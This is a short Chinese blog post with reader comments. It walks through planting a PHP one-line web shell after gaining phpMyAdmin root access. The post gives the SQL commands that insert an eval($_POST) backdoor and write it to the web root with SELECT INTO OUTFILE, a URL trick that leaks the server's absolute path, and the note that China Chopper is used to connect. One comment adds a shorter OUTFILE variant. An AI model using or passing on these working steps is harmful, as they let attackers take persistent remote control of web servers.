把今晚的思路整理一下。
拿到了phpmyadmin root权限以后。
create database wutongyu(这个为数据库名称).
use wutongyu(连接数据库)
create table shell(code text) (建立表shell,字段code为文本型数据)
insert into shell(code) values (‘<?php @eval($_POST[‘c’]);?>’); 插入一句话,密码为C
select * from shell into outfile “D:\\detai\\AppServ\\www\\phpMyAdmin2\\shell.php” (导出shell到绝对路径)
这里说一下导出的时候的绝对路径获取方法:
在你默认的数据库登录地址后面加:libraries/select_lang.lib.php
例如你的是www.xxx.com/phpmyadmin。添加完之后的地址就是:
www.xxx.com/phpmyadmin/libraries/select_lang.lib.php
访问就会爆出绝对路径。
导出之后,一句话木马,用菜刀链接。
整个过程也算完成了,提权方式因环境而异。对提权目前我也不熟悉。这里不过多阐述。
哇,强大啊。
虽然不是很懂,但是觉得蛮好玩的样子!
AFAIC that’s the best aesnwr so far!
一句就导出完了。
select “” into outfile “c:\\www\i.php”;
哈哈,都是好久之前的了。都被你挖出来了